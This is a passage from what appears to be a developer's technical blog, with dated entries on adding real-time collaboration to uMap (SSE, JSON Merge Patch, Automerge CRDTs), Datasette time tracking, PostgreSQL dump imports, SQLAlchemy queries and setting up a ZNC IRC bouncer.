One of the related subjects is transportation of the data between the client and the server. When we’ll get the local changes, we’ll need to find a way to send this data to the other clients, and ultimately to the server.

There are multiple ways to do this, and I spent some time trying to figure out the pros and cons of each approach. Here is a list:

WebRTC, the P2P approach. You let the clients talk to each other. I’m not sure where the server fits in this scenario. I’ve yet to figure out how this works in real-world scenarios, where you’re working behind a NAT, for instance. Also, what are the requirements on STUN / TURN servers, etc.
Using WebSockets seems nice at first glance, but I’m concerned about the resources this could take on the server. The requirement we have on “real-time” is not that strict (e.g. if it’s not immediate, it’s okay).
Using Server Sent Events is another way to solve this, and it seems lighter on the client and on the server. The server still needs to keep connections open, but I’ve found some proxies which will do that for you, so it would be something to put between the uMap server and the HTTP server.
Polling means fewer open connections, but also that the server will need to keep track of the messages the clients have yet to get. It’s easily solvable with a Redis queue for instance.

All of these scenarios are possible, and each of them has pros and cons. I’ll be working on a document this week to better understand what’s hidden behind each of these, so we can ultimately make a choice.
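
To get a feel for the bookkeeping that polling implies, here is a tiny in-memory sketch: one queue of pending messages per client, drained each time that client polls. The PollingMailbox class is made up for the example, and plain Python deques stand in for what would be Redis lists in a real deployment.

```python
from collections import deque


class PollingMailbox:
    """Keeps, for each client, the messages it hasn't fetched yet."""

    def __init__(self):
        self.queues = {}

    def register(self, client_id):
        self.queues.setdefault(client_id, deque())

    def publish(self, sender_id, message):
        """Queue the message for every registered client except the sender."""
        for client_id, queue in self.queues.items():
            if client_id != sender_id:
                queue.append(message)

    def poll(self, client_id):
        """Return the pending messages for this client and empty its queue."""
        queue = self.queues[client_id]
        pending = list(queue)
        queue.clear()
        return pending


mailbox = PollingMailbox()
for client in ("alice", "bob", "carol"):
    mailbox.register(client)

mailbox.publish("alice", {"kind": "update", "key": "name", "value": "Cycling paths"})
first_poll = mailbox.poll("bob")
second_poll = mailbox.poll("bob")
```

The cost is visible here: the server holds state for every client, including the ones that never come back to poll, so queues would need some kind of expiry.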

Server-Sent Events (SSE)

Here are some notes about SSE. I’ve learned that:

SSE makes it so that server connections never end (so it consumes a process?)
There is a library in Django for this, named django-eventstream
Django channels aims at using ASGI for certain parts of the app.
You don’t have to handle all this in Django. It’s possible to delegate it to pushpin, a proxy, using django-grip
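For reference, the SSE wire format itself is small: the response has the `text/event-stream` content type, and each event is a few `field: value` lines followed by a blank line. Here is a sketch of a formatter in plain Python; the `format_sse` helper and the event name are hypothetical, and libraries such as django-eventstream take care of this for you.

```python
import json
from typing import Optional


def format_sse(data: dict, event: Optional[str] = None, event_id: Optional[str] = None) -> str:
    """Serialize one message in the text/event-stream wire format."""
    lines = []
    if event_id is not None:
        lines.append(f"id: {event_id}")
    if event is not None:
        lines.append(f"event: {event}")
    # json.dumps never emits raw newlines, so a single "data:" line is enough.
    lines.append(f"data: {json.dumps(data)}")
    # A blank line terminates the event.
    return "\n".join(lines) + "\n\n"


message = format_sse({"layer": 1, "op": "add"}, event="datalayer-update", event_id="42")
```

The server keeps the HTTP response open and writes one such block per change, which is why each connected client holds a connection for as long as it listens.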

It raises questions for me in terms of infrastructure changes.

Importing a PostgreSQL dump under a different database name

2023-11-20T00:00:00+01:00

For Chariotte, I’ve had to do an import from one system to the other. I had no control over the export I received. It contained the database name and the ACLs, which I had to change to match the ones on the new system.

Decrypting the dump

First off, the import I received was encrypted, so I had to decrypt it. It took me some time to figure out that both my private and public keys needed to be imported into GPG. Once that was done, I could decrypt with:

# Decrypt the file
gpg --decrypt hb_chariotte_prod.pgdump.asc > hb_chariotte_prod.pgdump

# Upload it to the server with scp
scp hb_chariotte_prod.pgdump  chariotte:.

Importing while changing ACLs and database name

On the server, here is the command to change the name of the database and the user. The file I received was using the so-called “custom” format, which is not editable with a simple editor, so you have to export it to SQL first, and then edit it before running the actual queries.

# Convert to SQL, then replace the database name with the new one, and finally run the SQL statements.
pg_restore -C -f - hb_chariotte_prod.pgdump | sed 's/hb_chariotte_prod/chariotte_temp/g' | psql -U chariotte_temp -d chariotte_temp -h yourhost

Deploying and customizing datasette

2023-11-12T00:00:00+01:00

First, create the venv and install everything

# Create and activate venv
python3 -m venv venv
source venv/bin/activate

# Install datasette…
pip install datasette

# … and the plugins
datasette install datasette-render-markdown datasette-dashboards datasette-dateutil

I was curious how much all of this weighed. 30MB seems pretty reasonable to me.

# All of this weighs 30MB
du -sh venv
30M venv

Adding authentication

Datasette doesn’t provide authentication by default, so you have to use a plugin for this. I’ll be using Github authentication for now as it seems simple to add:

pip install datasette-auth-github

I’ve had to create a new github application and export the variables to my server, and add some configuration to my metadata.yaml file:

allow:
  gh_login: almet

plugins:
  datasette-auth-github:
    client_id:
      "$env": GITHUB_CLIENT_ID
    client_secret:
      "$env": GITHUB_CLIENT_SECRET

If that’s useful to you, here is the git repository I’m deploying to my server.

Using templates

Okay, I now want to be able to send a URL to the people I’m working with, on which they can see what I’ve been doing, and what I’ve been spending my time on.

It was pretty simple to do, and kind of weird to basically do what I used to do back in the day for my first PHP applications: put SQL statements in the templates! Heh.

I’ve added a template with what I want to do. It has the side-effect of being able to propose a read-only view to a private database.

<h1>{{project}}
    {# Named parameters avoid building the SQL by string concatenation #}
    {% for row in sql("SELECT SUM(CAST(duration AS REAL)) as total_hours FROM journal WHERE project = :project", {"project": project}, database="db") %}
({{ row["total_hours"] }} heures)
{% endfor %}
</h1>
<dl>
    {% for row in sql("select date, CAST(duration AS REAL) as duration, content from journal where project = :project order by date DESC", {"project": project}, database="db") %}
        <dt>{{ row["date"] }} ({{ row["duration"] }} heures)</dt>
        <dd>{{ render_markdown(row["content"]) }}</dd>
    {% endfor %}
</dl>

Which looks like this :

Adding Real-Time Collaboration to uMap, first week

2023-11-11T00:00:00+01:00

Last week, I was lucky enough to start working on uMap, an open-source map-making tool to create and share customizable maps, based on OpenStreetMap data.

My goal is to add real-time collaboration to uMap, but we first want to be sure we understand the issue correctly. There are multiple ways to solve this, so one part of the journey is to understand the problem properly (then, we’ll be able to choose the right path forward).

Part of the work is documenting it, so expect to see some blog posts around this in the future.

Installation

I started by installing uMap on my machine, made it work and read the codebase. uMap is written in Python and Django, and uses old-school JavaScript, specifically the Leaflet library for the GIS-related interface.

Installing uMap was simple. On a mac:

Create the venv and activate it

python3 -m venv venv
source venv/bin/activate
pip install -e .

Install the deps : brew install postgis (this will take some time to complete)

createuser umap
createdb umap -O umap
psql umap -c "CREATE EXTENSION postgis"

Copy the default config, point UMAP_SETTINGS to it, then install and run:

# Copy the default config to umap.conf
cp umap/settings/local.py.sample umap.conf
export UMAP_SETTINGS=~/dev/umap/umap.conf
make install
make installjs
make vendors
umap migrate
umap runserver

And you’re done!

On Arch Linux, I had to do some changes, but all in all it was simple:

createuser umap -U postgres
createdb umap -O umap -U postgres
psql umap -c "CREATE EXTENSION postgis" -Upostgres

Depending on your installation, you might need to change the USER that connects to the database.

The configuration could look like this:

DATABASES = {
    "default": {
        "ENGINE": "django.contrib.gis.db.backends.postgis",
        "NAME": "umap",
        "USER": "postgres",
    }
}

How it’s currently working

With everything working on my machine, I took some time to read the code and understand the current code base.

Here are my findings :

uMap is currently using a classical client/server architecture where :
The server is here mainly to handle access rights, store the data and send it over to the clients.
The actual rendering and modifications of the map are directly done in JavaScript, on the clients.

The data is split in multiple layers. At the time of writing, concurrent writes to the same layers are not possible, as one edit would potentially overwrite the other. It’s possible to have concurrent edits on different layers, though.

When a change occurs, each DataLayer is sent by the client to the server.

The data is updated on the server.
If the data has been modified by another client, an HTTP 422 (Unprocessable Entity) status is returned, which makes it possible to detect conflicts. The users are prompted about it, and asked if they want to overwrite the changes.
The files are stored as geojson files on the server as {datalayer.pk}_{timestamp}.geojson. A history of the last changes is preserved (the default settings preserve the last 10 revisions).
The data is stored in a Leaflet object and backups are made manually (it does not seem that changes are saved automatically).
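The conflict detection described above can be sketched as an optimistic check: the client sends back the version it last saw, and the server refuses the write if the stored version has moved on. This is only an illustration under that assumption. The `StoredLayer` class and its `version` counter are hypothetical, and uMap’s actual mechanism may differ.

```python
from dataclasses import dataclass


@dataclass
class StoredLayer:
    data: dict
    version: int = 0  # hypothetical counter, bumped on every successful save


def save_layer(stored: StoredLayer, new_data: dict, seen_version: int) -> int:
    """Return an HTTP-like status code for a save attempt."""
    if seen_version != stored.version:
        # Someone else saved in between: report the conflict, keep the data.
        return 422
    stored.data = new_data
    stored.version += 1
    return 200


layer = StoredLayer(data={"features": []})
alice_version = bob_version = layer.version  # both clients load version 0

status_alice = save_layer(layer, {"features": ["a"]}, alice_version)
status_bob = save_layer(layer, {"features": ["b"]}, bob_version)
```

Here the second save is rejected, which is the point where the user would be asked whether to overwrite the other person’s changes.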

Data

Each layer consists of two parts:

The properties (matching the _umap_options) on one side, and the geojson data (the Features key) on the other.
Each feature is composed of three keys:
geometry: the actual geo object
properties: the data associated with it
style: just styling information which goes with it, if any.
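As a rough picture of that structure, here is what a layer could look like once loaded in Python. All values are invented for illustration, and the exact key names and casing are an assumption based on the description above.

```python
import json

layer = {
    "type": "FeatureCollection",
    # Layer-level properties (illustrative values)
    "_umap_options": {"name": "Bike parking"},
    "features": [
        {
            "type": "Feature",
            "geometry": {"type": "Point", "coordinates": [-1.6778, 48.1173]},
            "properties": {"name": "Station A"},
            "style": {"color": "red"},
        }
    ],
}

# The whole layer serializes to a single JSON document.
serialized = json.dumps(layer)
feature_names = [feature["properties"]["name"] for feature in layer["features"]]
```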

Real-time collaboration : the different approaches

Behind the “real-time collaboration” name, we have :

The streaming of the changes to the clients: when you’re working with other persons on the same map, you can see their edits at the moment they happen.
The ability to handle concurrent changes: some changes can happen on the same data concurrently. In such a case, we need to merge them together and be able to
Offline editing: in some cases, one needs to map data but doesn’t have access to a network. Changes happen on a local device and are then synced with other devices / the server.

Keep in mind these notes are just food for thought, and that other approaches might be discovered along the way.

I’ve tried to come up with the different approaches I can follow in order to add the collaboration features we want.

JSON Patch and JSON Merge Patch: Two specifications by the IETF which define a format for generating and using diffs on json files. In this scenario, we could send the diffs from the clients to the server, and let it merge everything.
Using CRDTs: Conflict-free Replicated Data Types are one of the other options we have lying around. The technology has been used mainly to solve concurrent editing on text documents (like etherpad-lite), but should work fine on trees.

JSON Patch and JSON Merge Patch

I’ve stumbled on two IETF specifications for JSON Patch and JSON Merge Patch which respectively define how JSON diffs could be defined and applied.

There are multiple libraries for this, and at least one for Python, Rust and JS.

It’s even supported by the Redis database, which might come in handy in case we want to stream the changes with it.

If you’re making edits to the map without changing all the data all the time, it’s possible to generate diffs. For instance, let’s take this simplified data (it’s not valid geojson, but it should be enough for testing):

source.json

{
    "features": [
        {
            "key": "value"
        }
    ],
    "not_changed": "whatever"
}

And now let’s add a new object right after the first one :

destination.json

{
    "features": [
        {
            "key": "value"
        },
        {
            "key": "another-value"
        }
    ],
    "not_changed": "whatever"
}

If we generate a diff:

pipx install json-merge-patch
json-merge-patch create-patch source.json destination.json
{
    "features": [
        {
            "key": "value"
        },
        {
            "key": "another-value"
        }
    ]
}

Multiple things to note here:

It’s a valid JSON object
It doesn’t reproduce the not_changed key
But… I was expecting only the new item to show up. Instead, we are getting two items here, because it’s replacing the “features” key with everything inside.

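This is actually what the specification defines: with JSON Merge Patch (RFC 7396), arrays are always replaced as a whole. For reference, here is the add operation from the JSON Patch specification (RFC 6902):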

4.1. add

The “add” operation performs one of the following functions, depending upon what the target location references:

o If the target location specifies an array index, a new value is inserted into the array at the specified index.

o If the target location specifies an object member that does not already exist, a new member is added to the object

o If the target location specifies an object member that does exist, that member’s value is replaced.

It seems too bad for us, as this will happen each time a new feature is added to the feature collection.

It’s not working out of the box, but we could probably hack something together by having all features defined by a unique id, and send this to the server. We wouldn’t be using vanilla geojson files though, but adding some complexity on top of it.
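To check my understanding, here is a small sketch of merge-patch generation and application in plain Python, following the rules of RFC 7396 as I read them (objects are merged key by key, anything else is replaced, `null` removes a key). The function names are mine, and the second half tries the “features keyed by a unique id” idea with made-up ids.

```python
def create_merge_patch(source, target):
    """Build a merge patch that turns `source` into `target`."""
    if not isinstance(source, dict) or not isinstance(target, dict):
        # Non-objects (arrays included) are replaced as a whole.
        return target
    patch = {}
    for key in source:
        if key not in target:
            patch[key] = None  # null means "remove this member"
    for key, value in target.items():
        if key not in source:
            patch[key] = value
        elif source[key] != value:
            patch[key] = create_merge_patch(source[key], value)
    return patch


def apply_merge_patch(doc, patch):
    """Apply a merge patch to `doc` and return the patched copy."""
    if not isinstance(patch, dict):
        return patch
    result = dict(doc) if isinstance(doc, dict) else {}
    for key, value in patch.items():
        if value is None:
            result.pop(key, None)
        else:
            result[key] = apply_merge_patch(result.get(key), value)
    return result


# With a list of features, the patch repeats the whole list.
source = {"features": [{"key": "value"}], "not_changed": "whatever"}
destination = {
    "features": [{"key": "value"}, {"key": "another-value"}],
    "not_changed": "whatever",
}
list_patch = create_merge_patch(source, destination)

# With features keyed by a (hypothetical) unique id, only the new one shows up.
keyed_source = {"features": {"id-1": {"key": "value"}}, "not_changed": "whatever"}
keyed_destination = {
    "features": {"id-1": {"key": "value"}, "id-2": {"key": "another-value"}},
    "not_changed": "whatever",
}
keyed_patch = create_merge_patch(keyed_source, keyed_destination)
```

One limitation of this sketch, shared with the format itself: a value that is legitimately `null` in the target cannot be expressed, since `null` is reserved for removals.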

At this point, I left this here and went on to experiment with the other ideas. After all, the goal here is not (yet) to have something functional, but to clarify how the different options would play out.

Using CRDTs

I’ve had a look at the two main CRDT implementations that seem to be getting traction these days: Automerge and Yjs.

I’ve first tried to make Automerge work with Python, but the Automerge-py repository is outdated now and won’t build. I realized at this point that we might not even need a python implementation:

In this scenario, the server could just stream the changes from one client to the other, and the CRDT will guarantee that the structures will be similar on both clients. It’s handy because it means we won’t have to implement the CRDT logic on the server side.
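To illustrate why the server can stay “dumb” here, this is a toy CRDT in Python: a last-writer-wins map keyed by feature id. It is far simpler than what Automerge or Yjs do, and the change format is made up for the example, but it shows the property that matters: two replicas receiving the same changes in a different order end up in the same state.

```python
def merge(state: dict, change: tuple) -> dict:
    """Apply one change (key, timestamp, client, value) to a last-writer-wins map."""
    key, timestamp, client, value = change
    current = state.get(key)
    # Keep the entry with the highest (timestamp, client) pair, so the
    # outcome does not depend on the order in which changes arrive.
    if current is None or (timestamp, client) > current[:2]:
        state = {**state, key: (timestamp, client, value)}
    return state


changes = [
    ("feature-1", 1, "alice", {"name": "Bakery"}),
    ("feature-1", 2, "bob", {"name": "Bakery (closed)"}),
    ("feature-2", 1, "bob", {"name": "Library"}),
]

# Replica A receives the changes in order...
replica_a = {}
for change in changes:
    replica_a = merge(replica_a, change)

# ... while replica B receives them in reverse order.
replica_b = {}
for change in reversed(changes):
    replica_b = merge(replica_b, change)
```

The server only has to relay the changes; the merge rule lives entirely on the clients.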

Let’s do some JavaScript, then. A simple Leaflet map would look like this:

import L from 'leaflet';
import 'leaflet/dist/leaflet.css';

// Initialize the map and set its view to our chosen geographical coordinates and a zoom level:
const map = L.map('map').setView([48.1173, -1.6778], 13);

// Add a tile layer to add to our map, in this case using Open Street Map
L.tileLayer('https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png', {
    maxZoom: 19,
    attribution: '© OpenStreetMap contributors'
}).addTo(map);

// Initialize a GeoJSON layer and add it to the map
const geojsonFeature = {
    "type": "Feature",
    "properties": {
        "name": "Initial Feature",
        "popupContent": "This is where the journey begins!"
    },
    "geometry": {
        "type": "Point",
        "coordinates": [-0.09, 51.505]
    }
};

const geojsonLayer = L.geoJSON(geojsonFeature, {
    onEachFeature: function (feature, layer) {
        if (feature.properties && feature.properties.popupContent) {
            layer.bindPopup(feature.properties.popupContent);
        }
    }
}).addTo(map);

// Add new features to the map with a click
function onMapClick(e) {
    const newFeature = {
        "type": "Feature",
        "properties": {
            "name": "New Feature",
            "popupContent": "You clicked the map at " + e.latlng.toString()
        },
        "geometry": {
            "type": "Point",
            "coordinates": [e.latlng.lng, e.latlng.lat]
        }
    };

    // Add the new feature to the geojson layer
    geojsonLayer.addData(newFeature);
}

map.on('click', onMapClick);

Nothing fancy here, just a map which adds markers when you click. Now let’s add automerge:

We add a bunch of imports, the goal here will be to sync between tabs of the same browser. Automerge announced an automerge-repo library to help with all the wiring-up, so let’s try it out!

import { DocHandle, isValidAutomergeUrl, Repo } from '@automerge/automerge-repo'
import { BroadcastChannelNetworkAdapter } from '@automerge/automerge-repo-network-broadcastchannel'
import { IndexedDBStorageAdapter } from "@automerge/automerge-repo-storage-indexeddb"
import { v4 as uuidv4 } from 'uuid';

These were just imports. Don’t bother too much. The next section does the following:

Instantiate an “automerge repo”, which helps to send the right messages to the other peers if needed ;
Add a mechanism to create and initialize a repository if needed,
or otherwise look for an existing one, based on a hash passed in the URI.

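// Add an automerge repository. Sync to the other tabs of the same browser
// (BroadcastChannel) and persist the document locally (IndexedDB).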
const repo = new Repo({
    network: [new BroadcastChannelNetworkAdapter()],
    storage: new IndexedDBStorageAdapter(),
});

// Automerge-repo exposes a handle, which is mainly a wrapper around the library internals.
let handle: DocHandle<unknown>

const rootDocUrl = `${document.location.hash.substring(1)}`
if (isValidAutomergeUrl(rootDocUrl)) {
    handle = repo.find(rootDocUrl);
    let doc = await handle.doc();

    // Once we've found the data in the browser, let's add the features to the geojson layer.
    Object.values(doc.features).forEach(feature => {
        geojsonLayer.addData(feature);
    });

} else {
    handle = repo.create()
    await handle.doc();
    handle.change(doc => doc.features = {});
}

Let’s change the onMapClick function:

function onMapClick(e) {
    const uuid = uuidv4();
    // ... What was there previously
    newFeature.properties.id = uuid;

    // Add the new feature to the geojson layer.
    // Here we use the handle to do the change.
    handle.change(doc => { doc.features[uuid] = newFeature});
}

And on the other side of the logic, let’s listen to the changes:

handle.on("change", ({doc, patches}) => {
    // "patches" is a list of all the changes that happened to the tree.
    // Because we're sending JS objects, a lot of patches events are being sent.
    // 
    // Filter to only keep first-level events (we currently don't want to reflect
    // changes down the tree — yet)
    console.log("patches", patches);
    let inserted = patches.filter(({path, action}) => {
        return (path[0] == "features" && path.length == 2 && action == "put")
    });

    inserted.forEach(({path}) => {
        let uuid = path[1];
        let newFeature = doc.features[uuid];
        console.log(`Adding a new feature at position ${uuid}`)
        geojsonLayer.addData(newFeature);
    });
});

And… It’s working, here is a little video capture of two tabs working together :-)

It’s very rough, but the point was mainly to see how the library can be used, and what the API looks like. I’ve found that :

The patches object that’s being sent to the handle.on subscribers is very chatty: it contains all the changes, and I have to filter it to get what I want.
I was expecting the objects to be sent in one go, but it’s creating an operation for each change. For instance, setting a new object to a key will result in multiple events, as it will first create the object, and then populate it.
Here I need to keep track of all the edits, but I’m not sure how that will work out with for instance the offline use-case (or with limited connectivity). That’s what I’m going to find out next week, I guess :-)
The team behind Automerge is very welcoming, and was prompt to answer me when needed.
There seems to be another API, Automerge.getHistory() and Automerge.diff(), to get a patch between the different docs, which might prove more helpful than getting all the small patches.

We’ll figure that out next week, I guess!

Using Datasette for tracking my professional activity

2023-11-11T00:00:00+01:00

I’ve been following Simon Willison for quite some time, but I’ve actually never played with his main project Datasette before.

As I’m going back into development, I’m trying to track where my time goes, to be able to find patterns, and just remember how much time I’ve worked on such and such project. A discussion with Thomas made me realize it would be nice to track all this in a spreadsheet of some sort, which I was doing until today.

Spreadsheets are nice, but they don’t play well with rich content, and doing graphs with them is kind of tricky. So I went ahead and set everything up in Datasette.

First of all, I’ve imported my .csv file into a sqlite database:

sqlite3 -csv -header db.sqlite ".import journal.csv journal"

Then, I used sqlite-utils to do some tidying and change the column names:

# Rename a column
sqlite-utils transform db.sqlite journal --rename "quoi ?" content

# Make everything look similar
sqlite-utils convert db.sqlite journal project 'value.replace("Umap", "uMap")'

Here is my database schema:

sqlite-utils schema db.sqlite
CREATE TABLE "journal" (
   [date] TEXT,
   [project] TEXT,
   [duration] TEXT,
   [where] TEXT,
   [content] TEXT,
   [paid_work] INTEGER
);

And then installed datasette, with a few plugins, and ran it:

pipx install datasette
datasette install datasette-render-markdown datasette-write-ui datasette-dashboards datasette-dateutil

I then came up with a few SQL queries which are useful:

How much I’ve worked per project:

sqlite-utils db.sqlite "SELECT project, SUM(CAST(duration AS REAL)) as total_duration FROM journal GROUP BY project;"
[{"project": "Argos", "total_duration": XX},
 {"project": "IDLV", "total_duration": XX},
 {"project": "Notmyidea", "total_duration": XX},
 {"project": "Sam", "total_duration": XX},
 {"project": "uMap", "total_duration": XX}]

How much I’ve worked per week, in total (I’ve redacted the results for privacy):

sqlite-utils db.sqlite "SELECT strftime('%Y-W%W', date) AS week, SUM(CAST(duration AS REAL)) AS hours FROM journal GROUP BY week ORDER BY week;"

[{"week": "2023-W21", "hours": XX},
 {"week": "2023-W22", "hours": XX},
 {"week": "2023-W23", "hours": XX},
 {"week": "2023-W25", "hours": XX},
 {"week": "2023-W29", "hours": XX},
 {"week": "2023-W37", "hours": XX},
 {"week": "2023-W39", "hours": XX},
 {"week": "2023-W40", "hours": XX},
 {"week": "2023-W41", "hours": XX},
 {"week": "2023-W42", "hours": XX},
 {"week": "2023-W44", "hours": XX},
 {"week": "2023-W45", "hours": XX}]
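If you want to try these two queries without my data, here is a self-contained sketch using Python’s built-in sqlite3 module. The three rows are invented sample data and the table is reduced to the columns the queries need.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE journal (date TEXT, project TEXT, duration TEXT)")
conn.executemany(
    "INSERT INTO journal VALUES (?, ?, ?)",
    [
        ("2023-10-30", "uMap", "4"),
        ("2023-11-06", "uMap", "6.5"),
        ("2023-11-07", "Argos", "2"),
    ],
)

# Hours per week: durations are stored as text, hence the CAST.
per_week = conn.execute(
    "SELECT strftime('%Y-W%W', date) AS week, "
    "SUM(CAST(duration AS REAL)) AS hours "
    "FROM journal GROUP BY week ORDER BY week"
).fetchall()

# Hours per project.
per_project = conn.execute(
    "SELECT project, SUM(CAST(duration AS REAL)) AS total_duration "
    "FROM journal GROUP BY project ORDER BY project"
).fetchall()
```

Note that `%W` counts weeks starting on Monday, with the days before the first Monday of the year falling in week 00.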

I then created a quick dashboard using datasette-dashboards, which looks like this:

Using this configuration:

plugins:
  datasette-render-markdown:
    columns:
      - "content"
  datasette-dashboards:
    my-dashboard:
      title: Notmyidea
      filters:
        project:
          name: Projet
          type: select
          db: db
          query: SELECT DISTINCT project FROM journal WHERE project IS NOT NULL ORDER BY project ASC
      layout:
        - [hours-per-project]
        - [entries]
        - [hours-per-week]
      charts:
        hours-per-project:
          title: Nombre d'heures par projet
          query: SELECT project, SUM(CAST(duration AS REAL)) as total FROM journal GROUP BY project;
          db: db
          library: vega-lite
          display:
            mark: { type: arc, tooltip: true }
            encoding:
              color: { field: project, type: nominal }
              theta: { field: total, type: quantitative }
        hours-per-week:
          title: Heures par semaine
          query: SELECT strftime('%Y-W%W', date) AS week, SUM(CAST(duration AS REAL)) AS hours FROM journal GROUP BY week ORDER BY week;
          db: db
          library: vega-lite
          display:
            mark: { type: bar, tooltip: true }
            encoding:
              x: { field: week, type: ordinal}
              y: { field: hours, type: quantitative }

        entries:
          title: Journal
          db: db
          query: SELECT * FROM journal WHERE TRUE [[ AND project = :project ]] ORDER BY date DESC
          library: table
          display:

And ran datasette with:

datasette db.sqlite --root --metadata metadata.yaml

Using DISTINCT in Parent-Child Relationships

2023-10-18T00:00:00+02:00

Let’s say you have a model defined like this, with a Parent and a Child table:

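from datetime import datetime
from typing import List

from sqlalchemy import ForeignKey
from sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column, relationship


class Base(DeclarativeBase):
    pass


class Parent(Base):
    __tablename__ = "parent"
    id: Mapped[int] = mapped_column(primary_key=True)

    # The attribute name must match back_populates="children" on Child.parent
    children: Mapped[List["Child"]] = relationship(back_populates="parent")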


class Child(Base):
    __tablename__ = "child"
    id: Mapped[int] = mapped_column(primary_key=True)
    parent_id: Mapped[int] = mapped_column(ForeignKey("parent.id"))
    parent: Mapped["Parent"] = relationship(back_populates="children")

    born_at: Mapped[datetime] = mapped_column()

I’ve tried many ways, with complex subqueries and the like, before finding out about the DISTINCT SQL statement.

So, if you want to retrieve each parent with its most recent child, you can do it like this (on PostgreSQL, where SQLAlchemy renders distinct(Parent.id) as DISTINCT ON):

from sqlalchemy import desc

results = (
    db.query(Parent, Child)
    .join(Child)
    .distinct(Parent.id)
    .order_by(Parent.id, desc(Child.born_at))
    .all()
)
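For comparison, here is the same question (“the most recent child of each parent”) answered with the kind of subquery I was trying to avoid. It runs on SQLite through Python’s sqlite3 module, which has no DISTINCT ON; the tables mirror the models above and the rows are made up.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE parent (id INTEGER PRIMARY KEY);
    CREATE TABLE child (
        id INTEGER PRIMARY KEY,
        parent_id INTEGER REFERENCES parent(id),
        born_at TEXT
    );
    INSERT INTO parent (id) VALUES (1), (2);
    INSERT INTO child (id, parent_id, born_at) VALUES
        (10, 1, '2010-05-01'),
        (11, 1, '2015-09-12'),
        (20, 2, '2012-01-30');
    """
)

# Find the latest birth date per parent, then join back to get the full row.
rows = conn.execute(
    """
    SELECT child.parent_id, child.id, child.born_at
    FROM child
    JOIN (
        SELECT parent_id, MAX(born_at) AS latest
        FROM child
        GROUP BY parent_id
    ) AS newest
      ON newest.parent_id = child.parent_id AND newest.latest = child.born_at
    ORDER BY child.parent_id
    """
).fetchall()
```

The DISTINCT ON version gets the same result by sorting on (parent, born_at DESC) and keeping the first row of each parent, which reads much better.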

Convert string to duration

2023-10-11T00:00:00+02:00

I found myself wanting to convert a string to a duration (a number), for some configuration.

Something you can call like this:

string_to_duration("1d", target="days")     # 1.0
string_to_duration("1d", target="hours")    # 24.0
string_to_duration("3m", target="hours")    # raises ValueError (minutes to hours)
string_to_duration("3m", target="minutes")  # 3

The code :

from typing import Literal

def string_to_duration(value: str, target: Literal["days", "hours", "minutes"]):
    """Convert a string to a number of hours, days or minutes"""
    num = int("".join(filter(str.isdigit, value)))

    # It's not possible to convert from a smaller unit to a greater one:
    # - hours and minutes cannot be converted to days
    # - minutes cannot be converted to hours
    if (target == "days" and ("h" in value or "m" in value.replace("mo", ""))) or (
        target == "hours" and "m" in value.replace("mo", "")
    ):
        msg = (
            "Durations cannot be converted from a smaller to a greater unit. "
            f"(trying to convert '{value}' to {target})"
        )
        raise ValueError(msg, value)

    # Convert everything to minutes first; the division to hours or days happens at the end.
    if "h" in value:
        num = num * 60
    elif "d" in value:
        num = num * 60 * 24
    elif "w" in value:
        num = num * 60 * 24 * 7
    elif "mo" in value:
        num = num * 60 * 24 * 30  # considers 30d in a month
    elif "y" in value:
        num = num * 60 * 24 * 365
    elif "m" in value:
        num = num
    else:
        raise ValueError("Invalid duration value", value)

    if target == "hours":
        num = num / 60
    elif target == "days":
        num = num / 60 / 24

    return num
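As a variation, here is a sketch that parses the unit explicitly with a regular expression instead of checking for substrings. It is not the code I’m using, just an alternative under the same assumptions (30 days in a month, 365 in a year); `parse_minutes` and the lookup table are names made up for this example.

```python
import re

# Minutes per unit, using the same conventions as the function above.
MINUTES_PER_UNIT = {
    "m": 1,
    "h": 60,
    "d": 60 * 24,
    "w": 60 * 24 * 7,
    "mo": 60 * 24 * 30,
    "y": 60 * 24 * 365,
}

# "mo" is listed before "m" so that months are not read as minutes.
DURATION_RE = re.compile(r"(\d+)\s*(mo|m|h|d|w|y)")


def parse_minutes(value: str) -> int:
    """Convert a string such as '3m', '1d' or '2mo' to a number of minutes."""
    match = DURATION_RE.fullmatch(value.strip())
    if match is None:
        raise ValueError(f"Invalid duration value: {value!r}")
    amount, unit = match.groups()
    return int(amount) * MINUTES_PER_UNIT[unit]
```

Because the whole string has to match, inputs such as "1dh" or "d" are rejected instead of being silently interpreted.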

llm command-line tips

2023-09-27T00:00:00+02:00

I’m using llm more and more, and today I had to dig up prompts I used in the past. Here is a command I’ve been using, which allows me to filter the results based on what I want. It leverages sqlite-utils, a CLI tool which is able to talk to a SQLite database and answer in JSON, and jq, a command-line tool for querying JSON.

All in all, it’s pretty satisfying to use. I finally got a simple way to query databases! I’m also using glow, which is capable of transforming markdown into a better version on the terminal.

sqlite-utils "$(llm logs path)" "SELECT * FROM responses WHERE prompt LIKE '%search%'" | jq '.[].response' -r | glow

Which got me a colored response :-)

Setting up an IRC Bouncer with ZNC

2023-09-27T00:00:00+02:00

It’s been a while since I’ve used IRC, but I needed to connect to it today to discuss Peewee.

The main issue with IRC is that you need to be connected to see the answer, and to get the context of the conversation. Unless… you set up a bouncer.

The bouncer is named ZNC, and the IRC client I use is Weechat.

So, that’s what I did:

Installation of ZNC

apt install znc
sudo -u _znc /usr/bin/znc --datadir=/var/lib/znc --makeconf
sudo systemctl enable znc

You can answer the questions asked by --makeconf, and it will generate a configuration file for you, like this one (stored in /var/lib/znc/configs/znc.conf):

AnonIPLimit = 10
AuthOnlyViaModule = false
ConfigWriteDelay = 0
ConnectDelay = 5
HideVersion = false
LoadModule = webadmin
MaxBufferSize = 500
ProtectWebSessions = true
SSLCertFile = /var/lib/znc/znc.pem
SSLDHParamFile = /var/lib/znc/znc.pem
SSLKeyFile = /var/lib/znc/znc.pem
ServerThrottle = 30
Version = 1.8.2

<Listener listener0>
    AllowIRC = true
    AllowWeb = true
    IPv4 = true
    IPv6 = true
    Port = 6697
    SSL = true
    URIPrefix = /
</Listener>

<User alexis>
    Admin = true
    Allow = *
    AltNick = alexis_
    AppendTimestamp = false
    AuthOnlyViaModule = false
    AutoClearChanBuffer = true
    AutoClearQueryBuffer = true
    BindHost = skate.notmyidea.org
    ChanBufferSize = 50
    DenyLoadMod = false
    DenySetBindHost = false
    Ident = alexis
    JoinTries = 10
    LoadModule = chansaver
    LoadModule = controlpanel
    MaxJoins = 0
    MaxNetworks = 1
    MaxQueryBuffers = 50
    MultiClients = true
    Nick = alexis
    NoTrafficTimeout = 180
    PrependTimestamp = true
    QueryBufferSize = 50
